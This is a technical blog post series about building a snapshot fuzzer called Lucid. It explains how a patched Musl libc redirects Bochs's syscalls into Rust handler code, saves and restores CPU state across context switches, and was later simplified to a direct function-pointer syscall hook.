Our problem is that we need a globally accessible way for the program we load (eventually Bochs) to tell whether or not its running under Lucid or running as normal. We also have to provide many data structures and function addresses to Bochs so we need a vehicle do that.

What I’ve done is I’ve just created my own header file and placed it in Musl called lucid.h. This file defines all of the Lucid-specific data structures we need Bochs to have access to when it’s compiled against Musl. So in the header file right now we’ve defined a lucid_ctx data structure, and we’ve also created a global instance of one called g_lucid_ctx:

// An execution context definition that we use to switch contexts between the
// fuzzer and Bochs. This should contain all of the information we need to track
// all of the mutable state between snapshots that we need such as file data.
// This has to be consistent with LucidContext in context.rs
typedef struct lucid_ctx {
    // This must always be the first member of this struct
    size_t exit_handler;
    int save_inst;
    size_t save_size;
    size_t lucid_save_area;
    size_t bochs_save_area;
    struct register_bank register_bank;
    size_t magic;
} lucid_ctx_t;

// Pointer to the global execution context, if running inside Lucid, this will
// point to the a struct lucid_ctx_t inside the Fuzzer 
lucid_ctx_t *g_lucid_ctx;

Program Start Under Lucid

So in Lucid’s main function right now we do the following:

  • Load Bochs
  • Create an execution context
  • Jump to Bochs’ entry point and start executing

When we jump to Bochs’ entry point, one of the earliest functions called is a function in Musl called _dlstart_c located in the source file dlstart.c. Right now, we create that global execution context in Lucid on the heap, and then we pass that address in arbitrarily chosen r15. This whole function will have to change eventually because we’ll want to context switch from Lucid to Bochs to perform this in the future, but for now this is all we do:

pub fn start_bochs(bochs: Bochs, context: Box<LucidContext>) {
    // rdx: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    // rax: arbitrarily used as a jump target to the program entry
    // rsp: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    // r15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) bochs.rsp,
            in(reg) Box::into_raw(context),
            in("rax") bochs.entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber

So when we jump to Bochs entry point having come from Lucid, r15 should hold the address of the execution context. In _dlstart_c, we can check r15 and act accordingly. Here are those additions I made to Musl’s start routine:

hidden void _dlstart_c(size_t *sp, size_t *dynv)
	// The start routine is handled in inline assembly in arch/x86_64/crt_arch.h
	// so we can just do this here. That function logic clobbers only a few
	// registers, so we can have the Lucid loader pass the address of the 
	// Lucid context in r15, this is obviously not the cleanest solution but
	// it works for our purposes
	size_t r15;
	__asm__ __volatile__(
		"mov %%r15, %0" : "=r"(r15)

	// If r15 was not 0, set the global context address for the g_lucid_ctx that
	// is in the Rust fuzzer
	if (r15 != 0) {
		g_lucid_ctx = (lucid_ctx_t *)r15;

		// We have to make sure this is true, we rely on this
		if ((void *)g_lucid_ctx != (void *)&g_lucid_ctx->exit_handler) {
			__asm__ __volatile__("int3");

	// We didn't get a g_lucid_ctx, so we can just run normally
	else {
		g_lucid_ctx = (lucid_ctx_t *)0;

When this function is called, r15 remains untouched by the earliest Musl logic. So we use inline assembly to extract the value into a variable called r15 and check it for data. If it has data, we set the global context variable to the address in r15; otherwise we explicitly set it to NULL and run as normal. Now with a global set, we can do runtime checks for our environment and optionally call into the real kernel or into Lucid.

Lobotomizing Musl Syscalls

Now with our global set, it’s time to edit the functions responsible for making syscalls. Musl is very well organized so finding the syscall invoking logic was not too difficult. For our target architecture, which is x86_64, those syscall invoking functions are in arch/x86_64/syscall_arch.h. They are organized by how many arguments the syscall takes:

static __inline long __syscall0(long n)
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n) : "rcx", "r11", "memory");
	return ret;

static __inline long __syscall1(long n, long a1)
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1) : "rcx", "r11", "memory");
	return ret;

static __inline long __syscall2(long n, long a1, long a2)
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2)
						  : "rcx", "r11", "memory");
	return ret;

static __inline long __syscall3(long n, long a1, long a2, long a3)
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3) : "rcx", "r11", "memory");
	return ret;

static __inline long __syscall4(long n, long a1, long a2, long a3, long a4)
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10): "rcx", "r11", "memory");
	return ret;

static __inline long __syscall5(long n, long a1, long a2, long a3, long a4, long a5)
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8) : "rcx", "r11", "memory");
	return ret;

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;

For syscalls, there is a well defined calling convention. Syscalls take a β€œsyscall number” which determines what syscall you want in eax, then the next n parameters are passed in via the registers in order: rdi, rsi, rdx, r10, r8, and r9.

This is pretty intuitive but the syntax is a bit mystifying, like for example on those __asm__ __volatile__ ("syscall" lines, it’s kind of hard to see what it’s doing. Let’s take the most convoluted function, __syscall6 and break down all the syntax. We can think of the assembly syntax as a format string like for printing, but this is for emitting code instead:

  • unsigned long ret is where we will store the result of the syscall to indicate whether or not it was a success. In the raw assembly, we can see that there is a : and then "=a(ret)", this first set of parameters after the initial colon is to indicate output parameters. We are saying please store the result in eax (symbolized in the syntax as a) into the variable ret.
  • The next series of params after the next colon are input parameters. "a"(n) is saying, place the function argument n, which is the syscall number, into eax which is symbolized again as a. Next is store a1 in rdi, which is symbolized as D, and so forth
  • Arguments 4-6 are placed in registers above, for instance the syntax register long r10 __asm__("r10") = a4; is a strong compiler hint to store a4 into r10. And then later we see "r"(r10) says input the variable r10 into a general purpose register (which is already satisfied).
  • The last set of colon-separated values are known as β€œclobbers”. These tell the compiler what our syscall is expected to corrupt. So the syscall calling convention specifies that rcx, r11, and memory may be overwritten by the kernel.

With the syntax explained, we see what is taking place. The job of these functions is to translate the function call into a syscall. The calling convention for functions, known as the System V ABI, is different from that of a syscall, the register utilization differs. So when we call __syscall6 and pass its arguments, each argument is stored in the following register:

  • n β†’ rax
  • a1 β†’ rdi
  • a2 β†’ rsi
  • a3 β†’ rdx
  • a4 β†’ rcx
  • a5 β†’ r8
  • a6 β†’ r9

So the compiler will take those function args from the System V ABI and translate them into the syscall via the assembly that we explained above. So now these are the functions we need to edit so that we don’t emit that syscall instruction and instead call into Lucid.

Conditionally Calling Into Lucid

So we need a way in these function bodies to call into Lucid instead of emit syscall instructions. To do so we need to define our own calling convention, for now I’ve been using the following:

  • r15: contains the address of the global Lucid execution context
  • r14: contains an β€œexit reason” which is just an enum explaining why we are context switching
  • r13: is the base address of the register bank structure of the Lucid execution context, we need this memory section to store our register values to save our state when we context switch
  • r12: stores the address of the β€œexit handler” which is the function to call to context switch

This will no doubt change some as we add more features/functionality. I should also note that it is the functions responibility to preserve these values according to the ABI, so the function caller expects that these won’t change during a function call, well we are changing them. That’s ok because in the function where we use them, we are marking them as clobbers, remember? So the compiler is aware that they change, what the compiler is going to do now is before it executes any code, it’s going to push those registers onto the stack to save them, and then before exiting, pop them back into the registers so that the caller gets back the expected values. So we’re free to use them.

So to alter the functions, I changed the function logic to first check if we have a global Lucid execution context, if we do not, then execute the normal Musl function, you can see that here as I’ve moved the normal function logic out to a separate function called __syscall6_original:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
	if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }

However, if we are running under Lucid, I set up our calling convention by explicitly setting the registers r12-r15 in accordance to what we are expecting there when we context-switch to Lucid.

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);

Now with our calling convention set up, we can then use inline assembly as before. Notice we’ve replaced the syscall instruction with call r12, calling our exit handler as if it’s a normal function:

__asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
	return ret;

So now we’re calling the exit handler instead of syscalling into the kernel, and all of the registers are setup as if we’re syscalling. We’ve also got our calling convention registers set up. Let’s see what happens when we land on the exit handler, a function that is implemented in Rust inside Lucid. We are jumping from Bochs code directly to Lucid code!

Implementing a Context Switch

The first thing we need to do is create a function body for the exit handler. In Rust, we can make the function visible to Bochs (via our edited Musl) by declaring the function as an extern C function and giving it a label in inline assembly as such:

extern "C" { fn exit_handler(); }
    ".global exit_handler",

So this function is what will be jumped to by Bochs when it tries to syscall under Lucid. The first thing we need to consider is that we need to keep track of Bochs’ state the way the kernel would upon entry to the context switching routine. The first thing we’ll want to save off is the general purpose registers. By doing this, we can preserve the state of the registers, but also unlock them for our own use. Since we save them first, we’re then free to use them. Remember that our calling convention uses r13 to store the base address of the execution context register bank:

#[derive(Default, Clone)]
pub struct RegisterBank {
    pub rax:    usize,
    rbx:        usize,
    rcx:        usize,
    pub rdx:    usize,
    pub rsi:    usize,
    pub rdi:    usize,
    rbp:        usize,
    rsp:        usize,
    pub r8:     usize,
    pub r9:     usize,
    pub r10:    usize,
    r11:        usize,
    r12:        usize,
    r13:        usize,
    r14:        usize,
    r15:        usize,

We can save the register values then by doing this:

// Save the GPRS to memory
"mov [r13 + 0x0], rax",
"mov [r13 + 0x8], rbx",
"mov [r13 + 0x10], rcx",
"mov [r13 + 0x18], rdx",
"mov [r13 + 0x20], rsi",
"mov [r13 + 0x28], rdi",
"mov [r13 + 0x30], rbp",
"mov [r13 + 0x38], rsp",
"mov [r13 + 0x40], r8",
"mov [r13 + 0x48], r9",
"mov [r13 + 0x50], r10",
"mov [r13 + 0x58], r11",
"mov [r13 + 0x60], r12",
"mov [r13 + 0x68], r13",
"mov [r13 + 0x70], r14",
"mov [r13 + 0x78], r15",

This will save the register values to memory in the memory bank for preservation. Next, we’ll want to preserve the CPU’s flags, luckily there is a single instruction for this purpose which pushes the flag values to the stack called pushfq.

We’re using a pure assembly stub right now but we’d like to start using Rust at some point, that point is now. We have saved all the state we can for now, and it’s time to call into a real Rust function that will make programming and implementation easier. To call into a function though, we need to set up the register values to adhere to the function calling ABI remember. Two pieces of data that we want to be accessible are the execution context and the reason why we exited. Those are in r15 and r14 respectively remember. So we can simply place those into the registers used for passing function arguments and call into a Rust function called lucid_handler now.

// Save the CPU flags

// Set up the function arguments for lucid_handler according to ABI
"mov rdi, r15", // Put the pointer to the context into RDI
"mov rsi, r14", // Put the exit reason into RSI

// At this point, we've been called into by Bochs, this should mean that 
// at the beginning of our exit_handler, rsp was only 8-byte aligned and
// thus, by ABI, we cannot legally call into a Rust function since to do so
// requires rsp to be 16-byte aligned. Luckily, `pushfq` just 16-byte
// aligned the stack for us and so we are free to `call`
"call lucid_handler",

So now, we are free to execute real Rust code! Here is lucid_handler as of now:

// This is where the actual logic is for handling the Bochs exit, we have to 
// use no_mangle here so that we can call it from the assembly blob. We need
// to see why we've exited and dispatch to the appropriate function
fn lucid_handler(context: *mut LucidContext, exit_reason: i32) {
    // We have to make sure this bad boy isn't NULL 
    if context.is_null() {
        println!("LucidContext pointer was NULL");

    // Ensure that we have our magic value intact, if this is wrong, then we 
    // are in some kind of really bad state and just need to die
    let magic = LucidContext::ptr_to_magic(context);
    if magic != CTX_MAGIC {
        println!("Invalid LucidContext Magic value: 0x{:X}", magic);

    // Before we do anything else, save the extended state
    let save_inst = LucidContext::ptr_to_save_inst(context);
    if save_inst.is_err() {
        println!("Invalid Save Instruction");
    let save_inst = save_inst.unwrap();

    // Get the save area
    let save_area =
        LucidContext::ptr_to_save_area(context, SaveDirection::FromBochs);

    if save_area == 0 || save_area % 64 != 0 {
        println!("Invalid Save Area");

    // Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        _ => (), // NoSave

    // Try to convert the exit reason into BochsExit
    let exit_reason = BochsExit::try_from(exit_reason);
    if exit_reason.is_err() {
        println!("Invalid Bochs Exit Reason");
    let exit_reason = exit_reason.unwrap();
    // Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        _ => (), // NoSave

There are a few important pieces here to discuss.

Extended State

Let’s start with this concept of the save area. What is that? Well, we already have a general purpose registers saved and our CPU flags, but there is what’s called an β€œextended state” of the processor that we haven’t saved. This can include the floating-point registers, vector registers, and other state information used by the processor to support advanced execution features like SIMD (Single Instruction, Multiple Data) instructions, encryption, and other stuff like control registers. Is this important? It’s hard to say, we don’t know wtf Bochs will do, it might count on these to be preserved across function calls so I thought we’d go ahead and do it.

To save this state, you just execute the appropriate saving instruction for your CPU. To do this somewhat dynamically at runtime, I just query the processor for at least two saving instructions to see if they’re available, if they’re not, for now, we don’t support anything else. So when we create the execution context initially, we determine what save instruction we’ll need and store that answer in the execution context. Then on a context switch, we can dynamically use the approriate extended state saving function. This works because we don’t use any of the extended state in lucid_handler yet so it’s preserved still. You can see how I checked during context initialization here:

pub fn new() -> Result<Self, LucidErr> {
        // Check for what kind of features are supported we check from most 
        // advanced to least
        let save_inst = if std::is_x86_feature_detected!("xsave") {
        } else if std::is_x86_feature_detected!("fxsr") {
        } else {

        // Get save area size
        let save_size: usize = match save_inst {
            SaveInst::NoSave => 0,
            _ => calc_save_size(),

The way this works is the processor takes a pointer to memory where you want it saved and also how much you want saved, like what specific states. I just maxed out the amount of state I want saved and asked the CPU how much memory that would be:

// Standalone function to calculate the size of the save area for saving the 
// extended processor state based on the current processor's features. `cpuid` 
// will return the save area size based on the value of the XCR0 when ECX==0
// and EAX==0xD. The value returned to EBX is based on the current features
// enabled in XCR0, while the value returned in ECX is the largest size it
// could be based on CPU capabilities. So out of an abundance of caution we use
// the ECX value. We have to preserve EBX or rustc gets angry at us. We are
// assuming that the fuzzer and Bochs do not modify the XCR0 at any time.  
fn calc_save_size() -> usize {
    let save: usize;
    unsafe {
            "push rbx",
            "mov rax, 0xD",
            "xor rcx, rcx",
            "pop rbx",
            out("rax") _,       // Clobber
            out("rcx") save,    // Save the max size
            out("rdx") _,       // Clobbered by CPUID output (w eax)

    // Round up to the nearest page size
    (save + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)

I page align the result and then map that memory during execution context initialization and save the memory address to the execution state. Now at run time in lucid_handler we can save the extended state:

// Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        _ => (), // NoSave

Right now, all we’re handling for exit reasons are syscalls, so we invoke our syscall handler and then restore the extended state before returning back to the exit_handler assembly stub:

// Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        _ => (), // NoSave

Let’s see how we handle syscalls.

Implementing Syscalls

When we run the test program normally, not under Lucid, we get the following output:

Argument count: 1
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0

And when we run it with strace, we can see what syscalls are made:

execve("./test", ["./test"], 0x7ffca76fee90 /* 49 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd53887f5b8) = 0
set_tid_address(0x7fd53887f7a8)         = 850649
ioctl(1, TIOCGWINSZ, {ws_row=40, ws_col=110, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="Argument count: 1", iov_len=17}, {iov_base="\n", iov_len=1}], 2Argument count: 1
) = 18
writev(1, [{iov_base="Args:", iov_len=5}, {iov_base="\n", iov_len=1}], 2Args:
) = 6
writev(1, [{iov_base="   -./test", iov_len=10}, {iov_base="\n", iov_len=1}], 2   -./test
) = 11
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="g_lucid_ctx: 0", iov_len=14}, {iov_base="\n", iov_len=1}], 2g_lucid_ctx: 0
) = 15
exit_group(0)                           = ?
+++ exited with 0 +++

We see that the first two syscalls are involved with process creation, we don’t need to worry about those our process is already created and loaded in memory. The other syscalls are ones we’ll need to handle, things like set_tid_address, ioctl, and writev. We don’t worry about exit_group yet as that will be a fatal exit condition because Bochs shouldn’t exit if we’re snapshot fuzzing.

So we can use our saved register bank information to extract the syscall number from eax and dispatch to the appropriate syscall function! You can see that logic here:

// This is where we process Bochs making a syscall. All we need is a pointer to
// the execution context, and we can then access the register bank and all the
// peripheral structures we need
pub fn syscall_handler(context: *mut LucidContext) {
    // Get a handle to the register bank
    let bank = LucidContext::get_register_bank(context);

    // Check what the syscall number is
    let syscall_no = (*bank).rax;

    // Get the syscall arguments
    let arg1 = (*bank).rdi;
    let arg2 = (*bank).rsi;
    let arg3 = (*bank).rdx;
    let arg4 = (*bank).r10;
    let arg5 = (*bank).r8;
    let arg6 = (*bank).r9;

    match syscall_no {
        // ioctl
        0x10 => {
            //println!("Handling ioctl()...");
            // Make sure the fd is 1, that's all we handle right now?
            if arg1 != 1 {
                println!("Invalid `ioctl` fd: {}", arg1);

            // Check the `cmd` argument
            match arg2 as u64 {
                // Requesting window size
                libc::TIOCGWINSZ => {   
                    // Arg 3 is a pointer to a struct winsize
                    let winsize_p = arg3 as *mut libc::winsize;

                    // If it's NULL, return an error, we don't set errno yet
                    // that's a weird problem
                    // TODO: figure out that whole TLS issue yikes
                    if winsize_p.is_null() {
                        (*bank).rax = usize::MAX;

                    // Deref the raw pointer
                    let winsize = unsafe { &mut *winsize_p };

                    // Set to some constants
                    winsize.ws_row      = WS_ROW;
                    winsize.ws_col      = WS_COL;
                    winsize.ws_xpixel   = WS_XPIXEL;
                    winsize.ws_ypixel   = WS_YPIXEL;

                    // Return success
                    (*bank).rax = 0;
                _ => {
                    println!("Unhandled `ioctl` argument: 0x{:X}", arg1);
        // writev
        0x14 => {
            //println!("Handling writev()...");
            // Get the fd
            let fd = arg1 as libc::c_int;

            // Make sure it's an fd we handle
            if fd != STDOUT {
                println!("Unhandled writev fd: {}", fd);

            // An accumulator that we return
            let mut bytes_written = 0;

            // Get the iovec count
            let iovcnt = arg3 as libc::c_int;

            // Get the pointer to the iovec
            let mut iovec_p = arg2 as *const libc::iovec;

            // If the pointer was NULL, just return error
            if iovec_p.is_null() {
                (*bank).rax = usize::MAX;

            // Iterate through the iovecs and write the contents
            for i in 0..iovcnt {
                bytes_written += write_iovec(iovec_p);

                // Update iovec_p
                iovec_p = unsafe { iovec_p.offset(1 + i as isize) };

            // Update return value
            (*bank).rax = bytes_written;
        // nanosleep
        0x23 => {
            //println!("Handling nanosleep()...");
            (*bank).rax = 0;
        // set_tid_address
        0xDA => {
            //println!("Handling set_tid_address()...");
            // Just return Boch's pid, no need to do anything
            (*bank).rax = BOCHS_PID as usize;
        _ => {
            println!("Unhandled Syscall Number: 0x{:X}", syscall_no);

That’s about it! It’s kind of fun acting as the kernel. Right now our test program doesn’t do much, but I bet we’re going to have to figure out how to deal with things like files and such when using Bochs, but that’s a different time. Now all there is to do, after setting the return code via rax, is return back to the exit_handler stub and back to Bochs gracefully.

Returning Gracefully

    // Restore the flags

    // Restore the GPRS
    "mov rax, [r13 + 0x0]",
    "mov rbx, [r13 + 0x8]",
    "mov rcx, [r13 + 0x10]",
    "mov rdx, [r13 + 0x18]",
    "mov rsi, [r13 + 0x20]",
    "mov rdi, [r13 + 0x28]",
    "mov rbp, [r13 + 0x30]",
    "mov rsp, [r13 + 0x38]",
    "mov r8, [r13 + 0x40]",
    "mov r9, [r13 + 0x48]",
    "mov r10, [r13 + 0x50]",
    "mov r11, [r13 + 0x58]",
    "mov r12, [r13 + 0x60]",
    "mov r13, [r13 + 0x68]",
    "mov r14, [r13 + 0x70]",
    "mov r15, [r13 + 0x78]",

    // Return execution back to Bochs!

We restore the CPU flags, restore the general purpose registers, and then we simple ret like we’re done with the function call. Don’t forget we already restored the extended state before within lucid_context before returning from that function.


And just like that, we have an infrastructure that is capable of handling context switches from Bochs to the fuzzer. It will no doubt change and need to be refactored, but the ideas will remain similar. We can see the output below demonstrates the test program running under Lucid with us handling the syscalls ourselves:

[08:15:56] lucid> Loading Bochs...
[08:15:56] lucid> Bochs mapping: 0x10000 - 0x18000
[08:15:56] lucid> Bochs mapping size: 0x8000
[08:15:56] lucid> Bochs stack: 0x7F8A50FCF000
[08:15:56] lucid> Bochs entry: 0x11058
[08:15:56] lucid> Creating Bochs execution context...
[08:15:56] lucid> Starting Bochs...
Argument count: 4
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0x55f27f693cd0
Unhandled Syscall Number: 0xE7

Next Up?

Next we will compile Bochs against Musl and work on getting it to work. We’ll need to implement all of its syscalls as well as get it running a test target that we’ll want to snapshot and run over and over. So the next blogpost should be a Bochs that is syscall-sandboxed snapshotting and rerunning a hello world type target. Until then!

Fuzzer Development 3: Building Bochs, MMU, and File I/0

By: h0mbre
5 March 2024 at 05:00


This is the next installment in a series of blogposts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the Lucid repository


We’re continuing today on our journey to develop our fuzzer. Last time we left off, we had developed the beginnings of a context-switching infrastructure so that we could sandbox Bochs (really a test program) from touching the OS kernel during syscalls.

In this post, we’re going to go over some changes and advancements we’ve made to the fuzzer and also document some progress related to Bochs itself.

Syscall Infrastructure Update

After putting out the last blogpost, I got some really good feedback and suggestions by Fuzzing discord legend WorksButNotTested, who informed me that we could cut down on a lot of complexity if we scrapped the full context-switching/C-ABI-to-Syscall-ABI-Register-Translation routines all together and simply had Bochs call a Rust function from C for syscalls. This is very intuitive and obvious in hindsight and I’m admittedly a little embarrassed to have overlooked this possibility.

Previously, in our custom Musl code, we would have a C function call like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;

This is the function that is called when the program needs to make a syscall with 6 arguments. In the previous blog, we changed this function to be an if/else such that if the program was running under Lucid, we would instead call into Lucid’s context-switch function after shuffling the C ABI registers to Syscall registers like so:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);
    __asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
	return ret;

So this was quite involved. I was very fixated on the idea that β€œLucid has to be the kernel. And when userland programs execute a syscall, their state is saved and execution is started in the kernel”. This proved to lead me astray since such a complicated routine is not needed for our purposes, we are not actually a kernel, we just want to sandbox away syscalls for one specific program who behaves pretty well. WorksButNotTested instead suggested just calling a Rust function like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
	if (g_lucid_syscall)
		return g_lucid_syscall(g_lucid_ctx, n, a1, a2, a3, a4, a5, a6);
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;

Obviously this is a much simpler solution and we get to avoid scrambling registers/saving state/inline-assembly and the rest of it. To set this function up, we just simply created a new function pointer global variable in lucid.h in Musl and gave it a definition in src/lucid.c which can you see in the Musl patches in the repo. g_lucid_syscall looks like this on the Rust side:

pub extern "C" fn lucid_syscall(contextp: *mut LucidContext, n: usize,
    a1: usize, a2: usize, a3: usize, a4: usize, a5: usize, a6: usize)
    -> u64 

We get to use the C ABI to our advantage and maintain the semantics of how a program would normally use Musl, and it’s just a very much appreciated suggestion and I couldn’t be happier with how it turned out.

Calling Convention Changes

During this refactoring for syscalls, I also simplified the way our context-switching calling convention would work. Instead of using 4 separate registers for the calling convention, I decided it was doable by just passing a pointer to the Lucid execution context and having the context_switch function itself work out how it should behave based on the context’s values. In essence, we’re moving complexity from the caller-side to the callee-side. This means that the complexity doesn’t keep recurring throughout the codebase, it is encapsulated one time, in the context_switch logic itself. This does require some hacky/brittle code however, for instance we have to hardcode some struct offsets for the Lucid execution data structure, but that is a small price to pay in my opinion for drastically reduced complexity. The context_switch code has been changed to the following

extern "C" { fn context_switch(); }
    ".global context_switch",

    // Save the CPU flags before we do any operations

    // Save registers we use for scratch
    "push r14",
    "push r13",

    // Determine what execution mode we're in
    "mov r14, r15",
